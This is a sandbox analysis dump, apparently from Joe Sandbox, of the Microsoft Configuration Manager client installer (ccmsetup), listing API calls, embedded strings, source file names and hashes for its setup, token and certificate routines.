                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetHomeMPFromWMI$Capabilities$CurrentManagementPoint$LSGetHomeMPFromWMI$Protocol$Version$root\ccm$select * from SMS_Authority$spEnum.Next(&spObject) == WBEM_S_NO_ERROR$spNS.Open(L"root\\ccm")$spNS.Query(c_sSMSAuthority, &spEnum)$spObject.GetString(L"CurrentManagementPoint", sHomeMP)$spObject.GetString(L"Protocol", sProtocol)
                                                                                          • API String ID: 355227296-2745819085
                                                                                          • Opcode ID: 67385142761794c89394530a3257f605ef3bacfc361fedcf8c7b8e37fa2c8841
                                                                                          • Instruction ID: b4cfebc80ef7b905087d37829cb4b112fb2565b31ac2f03e32925d6f0e252b12
                                                                                          • Opcode Fuzzy Hash: 67385142761794c89394530a3257f605ef3bacfc361fedcf8c7b8e37fa2c8841
                                                                                          • Instruction Fuzzy Hash: F581BC70941268AADB25EBA0DD0AFEE7F66FF91B00F044049F451BB3C2CBB85A45C765
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00586318
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005863A9
                                                                                          • _rand.LIBCMT ref: 00586457
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005864B1
                                                                                          • _rand.LIBCMT ref: 005864F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058654F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058667B
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 005864BD
                                                                                          • Failed to find new accessible source. Retrying previous source., xrefs: 005865F0
                                                                                          • ccmsetup.cpp, xrefs: 0058655B
                                                                                          • Found available source %s, xrefs: 00586794
                                                                                          • ccmsetup.cpp, xrefs: 00586399
                                                                                          • ccmsetup.cpp, xrefs: 005864A1
                                                                                          • ccmsetup.cpp, xrefs: 0058653F
                                                                                          • CcmSetup::FindAvailableSource, xrefs: 00586344
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586676
                                                                                          • WaitForRetry(), xrefs: 00586671
                                                                                          • CheckForAvailableSources(itStart,sSourceDir, bPreviousSourceAccessible,bPreviousSource,bFoundSource,true), xrefs: 005864A7
                                                                                          • FindAvailableSource failed with error 0x%x, xrefs: 00586758
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058654A
                                                                                          • Determining source location..., xrefs: 00586431
                                                                                          • Found accessible source: %s, xrefs: 005866BD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005864AC
                                                                                          • ccmsetup.cpp, xrefs: 00586687
                                                                                          • CheckForAvailableSources(itStart,sSourceDir,bPreviousSourceAccessible,bPreviousSource,bFoundSource,false), xrefs: 00586545
                                                                                          • Failed to find an available source., xrefs: 0058658F
                                                                                          • ((m_oSourceDirs.size() > 0) || (m_oFQDNSourceDirs.size() > 0)), xrefs: 0058639F
                                                                                          • No sources defined, xrefs: 005863D9
                                                                                          • ccmsetup.cpp, xrefs: 0058666B
                                                                                          • \_j, xrefs: 005863C9
                                                                                          • ccmsetup.cpp, xrefs: 005863B1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005863A4
                                                                                          • Failed to find accessible source. Waiting for retry., xrefs: 0058662E
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$_rand$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$((m_oSourceDirs.size() > 0) || (m_oFQDNSourceDirs.size() > 0))$CcmSetup::FindAvailableSource$CheckForAvailableSources(itStart,sSourceDir, bPreviousSourceAccessible,bPreviousSource,bFoundSource,true)$CheckForAvailableSources(itStart,sSourceDir,bPreviousSourceAccessible,bPreviousSource,bFoundSource,false)$Determining source location...$Failed to find accessible source. Waiting for retry.$Failed to find an available source.$Failed to find new accessible source. Retrying previous source.$FindAvailableSource failed with error 0x%x$Found accessible source: %s$Found available source %s$No sources defined$WaitForRetry()$\_j$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 4254737775-3107171301
                                                                                          • Opcode ID: ba6bb32223abf09a663232a97955a24beae000f58727b0b6154ee40e9acc3e49
                                                                                          • Instruction ID: f892500b43d039a8e5ab5afaba63b964256bea5cf276d909428e7971957fc4d6
                                                                                          • Opcode Fuzzy Hash: ba6bb32223abf09a663232a97955a24beae000f58727b0b6154ee40e9acc3e49
                                                                                          • Instruction Fuzzy Hash: F1C19D71D04359AADF20EFA4C84ABEDBFBABF45300F144059E904BB282DBB45A49CF51
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0058C2D6
                                                                                            • Part of subcall function 005BB745: __EH_prolog3_catch_GS.LIBCMT ref: 005BB74C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C33F
                                                                                            • Part of subcall function 0058AE97: __EH_prolog3.LIBCMT ref: 0058AE9E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C3B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C491
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058C4F6
                                                                                          Strings
                                                                                          • CcmSetup::HandleOldClientUninstall, xrefs: 0058C2F2
                                                                                          • ccm, xrefs: 0058C5B9
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 0058C42F
                                                                                          • ccmsetup.cpp, xrefs: 0058C3C0
                                                                                          • ccmsetup.cpp, xrefs: 0058C4FE
                                                                                          • ccmsetup.cpp, xrefs: 0058C499
                                                                                          • ShouldCurrentClientBeUninstalled( sMinimumUpgradableVersion, bShouldUninstallClient ), xrefs: 0058C335
                                                                                          • Namespace root\ccm exists but SCCM client or MP/MCS/PullDP is not installed. Clear the namespace in case it's not cleaned up prope, xrefs: 0058C58D
                                                                                          • UninstallRelatedProducts( c_szClientUpgradeCode, m_sMsiUninstallLogFile.length() > 0 ? m_sMsiUninstallLogFile : m_sMsiLogFile, (m_, xrefs: 0058C487
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C3B3
                                                                                          • ccmsetup.cpp, xrefs: 0058C347
                                                                                          • ccmsetup.cpp, xrefs: 0058C32F
                                                                                          • (*it)(this), xrefs: 0058C3AE
                                                                                          • CCM hosted server application is detected, xrefs: 0058C644
                                                                                          • ccmsetup.cpp, xrefs: 0058C4E6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C4F1
                                                                                          • IsClientInstalled(bClientInstalled), xrefs: 0058C4EC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C48C
                                                                                          • ccmsetup.cpp, xrefs: 0058C3A8
                                                                                          • k%, xrefs: 0058C3EC
                                                                                          • Failed to clear root\ccm namespace with error 0x%x, xrefs: 0058C5F6
                                                                                          • root, xrefs: 0058C5A2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058C33A
                                                                                          • ccmsetup.cpp, xrefs: 0058C481
                                                                                          • root\ccm, xrefs: 0058C54C
                                                                                          • A newer version client is being installed over an old client and uninstalling old client is necessary. Uninstalling the old clien, xrefs: 0058C3F6
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(*it)(this)$A newer version client is being installed over an old client and uninstalling old client is necessary. Uninstalling the old clien$CCM hosted server application is detected$CcmSetup::HandleOldClientUninstall$Failed to clear root\ccm namespace with error 0x%x$IsClientInstalled(bClientInstalled)$Namespace root\ccm exists but SCCM client or MP/MCS/PullDP is not installed. Clear the namespace in case it's not cleaned up prope$ShouldCurrentClientBeUninstalled( sMinimumUpgradableVersion, bShouldUninstallClient )$UninstallRelatedProducts( c_szClientUpgradeCode, m_sMsiUninstallLogFile.length() > 0 ? m_sMsiUninstallLogFile : m_sMsiLogFile, (m_$ccm$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$k%$root$root\ccm${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 133077043-3291407230
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005813D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00581462
                                                                                          • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 005814AD
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 005814B7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005814EC
                                                                                          • Sleep.KERNEL32(000003E8,00000001,00000000,00000000,?,?,ccmsetup.exe), ref: 0058155D
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 0058156F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005815FD
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,032FCCBC), ref: 00581621
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005816C2
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$ErrorLast$DeleteEventFileH_prolog3_catch_ResetSleep
                                                                                          • String ID: tk$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$Attempt to delete %s failed (0x%x)$CcmSetup::DownloadCcmsetup$DeleteFileW(sDestPath)$DownloadFileBySMB( g_pSetupEnv->GetModuleFullPath(), false, true, false, true, sDestPath, 0 )$GetServiceExecutionMutex()$ResetEvent(m_shCcmsetupServiceEvent)$Successfully deleted existing %s$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.exe
                                                                                          • API String ID: 88874183-4229826525
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0059C21B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C297
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C304
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C355
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C3C5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C40E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0059C45E
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CcmSetup::ServiceCtrlHandler$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$g_pCcmSetup->OnPowerEvent(uEventType, pEventData)$g_pCcmSetup->Pause()$g_pCcmSetup->Resume()$g_pCcmSetup->Stop()$g_pCcmSetup->Stop()
                                                                                          • API String ID: 3454896115-3257362122
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005853B4
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005A72A4: __EH_prolog3_catch_GS.LIBCMT ref: 005A72AE
                                                                                            • Part of subcall function 005A72A4: GetCurrentThreadId.KERNEL32 ref: 005A73C9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585426
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585516
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005855F8
                                                                                          Strings
                                                                                          • ,aj, xrefs: 005857CB
                                                                                          • x64/client.msi, xrefs: 00585595
                                                                                          • Zj, xrefs: 005856E8
                                                                                          • Some client prerequisites were not installed., xrefs: 005857D9
                                                                                          • setupManifest.DiscoverOrderedInstallList(), xrefs: 005853AA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005853AF
                                                                                          • hrRes, xrefs: 005855EE
                                                                                          • ccmsetup.cpp, xrefs: 0058542E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00585511
                                                                                          • \Wj, xrefs: 005856AE
                                                                                          • ccmsetup.cpp, xrefs: 00585416
                                                                                          • The client prerequisite '%s' was found to be be missing but a reboot may be pending. Ignoring this prerequisite for now., xrefs: 0058574C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00585421
                                                                                          • i386/client.msi, xrefs: 00585580
                                                                                          • <\j, xrefs: 00585737
                                                                                          • The client prerequisite '%s' was found to be missing. But IgnoreFailure flag is defined. , xrefs: 005856C3
                                                                                          • ccmsetup.cpp, xrefs: 00585506
                                                                                          • setupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, &bIgnoreFail, xrefs: 0058550C
                                                                                          • ccmsetup.cpp, xrefs: 0058551E
                                                                                          • The client prerequisite '%s' was found to be missing., xrefs: 005856FD
                                                                                          • setupManifest.GetInstallListCount( iInstallCount ), xrefs: 0058541C
                                                                                          • ccmsetup.cpp, xrefs: 005855E8
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005855F3
                                                                                          • ccmsetup.cpp, xrefs: 005853A4
                                                                                          • ccmsetup.cpp, xrefs: 00585600
                                                                                          • ccmsetup.cpp, xrefs: 005853BC
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$,aj$<\j$Some client prerequisites were not installed.$The client prerequisite '%s' was found to be be missing but a reboot may be pending. Ignoring this prerequisite for now.$The client prerequisite '%s' was found to be missing.$The client prerequisite '%s' was found to be missing. But IgnoreFailure flag is defined. $\Wj$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$hrRes$i386/client.msi$setupManifest.DiscoverOrderedInstallList()$setupManifest.GetInstallInfo( iIndex, sFileName, sParams, installType, arrSuccessReturnCodes, &bImpactClientState, 0, &bIgnoreFail$setupManifest.GetInstallListCount( iInstallCount )$x64/client.msi$Zj
                                                                                          • API String ID: 3353525418-6844956
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065A13D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A259
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A2BC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A360
                                                                                            • Part of subcall function 0065BC6C: __EH_prolog3_catch_GS.LIBCMT ref: 0065BC73
                                                                                            • Part of subcall function 0065BC6C: EnterCriticalSection.KERNEL32(?,CCM::Authentication::CEncryptedTokenCache::GetToken,00000070,0065A1F8,?,0070E88C,S-1-5-18,?,00000000,000000FF,CCM::Authentication::CCcmTokenMgr::GetToken,00000090,00659DB5,0070E8B0,00000008,00000000), ref: 0065BCC6
                                                                                            • Part of subcall function 0065BC6C: GetCurrentThreadId.KERNEL32 ref: 0065BD08
                                                                                            • Part of subcall function 0065BC6C: LeaveCriticalSection.KERNEL32(?,?,00000008,CCM::Authentication::CEncryptedTokenCache::GetToken,00000070,0065A1F8,?,0070E88C,S-1-5-18,?,00000000,000000FF,CCM::Authentication::CCcmTokenMgr::GetToken,00000090,00659DB5,0070E8B0), ref: 0065BD2A
                                                                                            • Part of subcall function 0065BEF0: __EH_prolog3_catch_GS.LIBCMT ref: 0065BEF7
                                                                                            • Part of subcall function 0065BEF0: GetCurrentThreadId.KERNEL32 ref: 0065BF79
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A3B6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065A423
                                                                                          Strings
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A350
                                                                                          • Security::GetSidStringFromCurrentProcess(sUserSid), xrefs: 0065A2B2
                                                                                          • Failed to get user sid. Error 0x%x, xrefs: 0065A2F2
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A261
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A41E
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A254
                                                                                          • RetrieveTokenFromStsServer(szPotentialServerUrl, sAADToken, sCcmToken, ulExpiresIn), xrefs: 0065A356
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A3A6
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A368
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A42B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A3B1
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A2AC
                                                                                          • g_cacheEncryptedTokens.SetToken(sActualUserSid, sCcmToken, ulExpiresIn), xrefs: 0065A3AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A2B7
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A413
                                                                                          • g_cacheEncryptedTokens.SetToken(sUserSid, sCcmToken, ulExpiresIn), xrefs: 0065A419
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065A35B
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A249
                                                                                          • CcmUtilLib::CcmGetAADToken(sActualUserSid, sAADToken, sAADUserId), xrefs: 0065A24F
                                                                                          • }, xrefs: 0065A2E7
                                                                                          • CCM::Authentication::CCcmTokenMgr::GetToken, xrefs: 0065A191
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A2C5
                                                                                          • ..\ccmtoken.cpp, xrefs: 0065A3BE
                                                                                          • S-1-5-18, xrefs: 0065A1CD, 0065A3CE
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$CriticalSection$EnterH_prolog3Leave
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$..\ccmtoken.cpp$CCM::Authentication::CCcmTokenMgr::GetToken$CcmUtilLib::CcmGetAADToken(sActualUserSid, sAADToken, sAADUserId)$Failed to get user sid. Error 0x%x$RetrieveTokenFromStsServer(szPotentialServerUrl, sAADToken, sCcmToken, ulExpiresIn)$S-1-5-18$Security::GetSidStringFromCurrentProcess(sUserSid)$g_cacheEncryptedTokens.SetToken(sActualUserSid, sCcmToken, ulExpiresIn)$g_cacheEncryptedTokens.SetToken(sUserSid, sCcmToken, ulExpiresIn)$}
                                                                                          • API String ID: 3602753738-1313536212
                                                                                          • Opcode ID: 79e79b7276087695c1a9867b75c46018a0e14122083c3c2ee5277e346705f15a
                                                                                          • Instruction ID: 53c5f4f13d508902c419426984c4afc4302a5156eb3fa574ff837d1cd9b78047
                                                                                          • Opcode Fuzzy Hash: 79e79b7276087695c1a9867b75c46018a0e14122083c3c2ee5277e346705f15a
                                                                                          • Instruction Fuzzy Hash: 9991D271D40218AADF20EBE4CC4ABEE7EB9BB50700F148159F510F7382DB785A49CB62
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00625168
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006251D9
                                                                                            • Part of subcall function 0062238D: __EH_prolog3_catch.LIBCMT ref: 00622394
                                                                                            • Part of subcall function 0062238D: GetCurrentThreadId.KERNEL32 ref: 006223F4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00625238
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062527B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006252CA
                                                                                          • CertCompareCertificateName.CRYPT32(00000001,?,00000000), ref: 006252FC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062535A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertCertificateCompareH_prolog3H_prolog3_catchH_prolog3_catch_Name
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != pCertContext$0 != pIssuerNameBlobs$CcmGetCertNameStr(pIssuerNameBlobs[idx], sIssuerName)$CcmGetCertSubjectNameEx(pCertContext, sSubjectName)$CcmUtilLib::CcmIsAllowedIssuer$Issuer: [%s] Expected Issuer: [%s]$nIssuers >= 1$t)l
                                                                                          • API String ID: 1624474820-562805160
                                                                                          • Opcode ID: 4c78c40108e0862226e809304c54f3de31cc2138ff954e7de620169ad56437b6
                                                                                          • Instruction ID: f4f26aef473be13b136bc002834492fdb3706e0466bb9445ca2f2b39f2f0b2c1
                                                                                          • Opcode Fuzzy Hash: 4c78c40108e0862226e809304c54f3de31cc2138ff954e7de620169ad56437b6
                                                                                          • Instruction Fuzzy Hash: FE81E470D41B59EACF20DFA4DC4ABEDBBB9AF55714F148045F802BB282C7785A06CB60
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F4345
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F439F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F4402
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F4453
                                                                                          • CoTaskMemAlloc.OLE32(?,?,00000000,?,00000001,?,?,CCM::Utility::String::CoAllocString,00000020,0063C82E,00000000,?,?,?,?,CCM::LocationServices::CcmGetHomeMPFromWMIEx), ref: 005F4469
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F449F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F44F2
                                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,?), ref: 005F452E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmp
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Task$AllocFreeH_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pszDest != 0) != 0$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$..\String.cpp$CCM::Utility::String::CoAllocString$StringCchCopyW( pszDest, uLength, c_str() )$ULongAdd(1, (ULONG)length(), &uLength)$ULongMult(uLength, sizeof(WCHAR), &cbLength)$pszString != 0
                                                                                          • API String ID: 3351718187-1587873651
                                                                                          • Opcode ID: 838d3e5b7ee5094fa832d53e7ea7728960430a53a0ce3fa413d99d7e52064204
                                                                                          • Instruction ID: 381a98f1198fa5146c1451ee5f28a902821f6bf90a6ef876077300aecd182211
                                                                                          • Opcode Fuzzy Hash: 838d3e5b7ee5094fa832d53e7ea7728960430a53a0ce3fa413d99d7e52064204
                                                                                          • Instruction Fuzzy Hash: 755194B1A80329AEDB119FA09D06FBF7EB5BB54B14F144055FA40BB2C1C7BD5A418BA0
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006130D4
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061312F
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006131B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00613217
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00613265
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00613260
                                                                                          • ..\usertoken.cpp, xrefs: 00613137
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00613212
                                                                                          • ..\usertoken.cpp, xrefs: 0061326D
                                                                                          • ..\usertoken.cpp, xrefs: 00613207
                                                                                          • ..\usertoken.cpp, xrefs: 00613255
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006131AC
                                                                                          • ,hw, xrefs: 00613307
                                                                                          • shUserKey.GetDword(c_szCcmCachedUserSessionIDValue, pdwSessionId), xrefs: 0061325B
                                                                                          • shUserKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szCcmCachedUserKey, ((((0x00020000L)) | (0x0001) | (0x0008) | (0x0010, xrefs: 006131A7
                                                                                          • Cached CCM (user, session) is: (%s,%d)., xrefs: 006132AE
                                                                                          • Failed to retrieve current (user,session) pair (0x%08x)., xrefs: 00613316
                                                                                          • ..\usertoken.cpp, xrefs: 0061311F
                                                                                          • UserSID, xrefs: 006131DF
                                                                                          • CCM::Utility::Security::GetCcmUserSessionPair, xrefs: 006130E9
                                                                                          • ..\usertoken.cpp, xrefs: 006131A1
                                                                                          • ..\usertoken.cpp, xrefs: 006131B9
                                                                                          • 0 != pdwSessionId, xrefs: 00613125
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0061312A
                                                                                          • shUserKey.GetString(c_szCcmCachedUserValue, sUserSid), xrefs: 0061320D
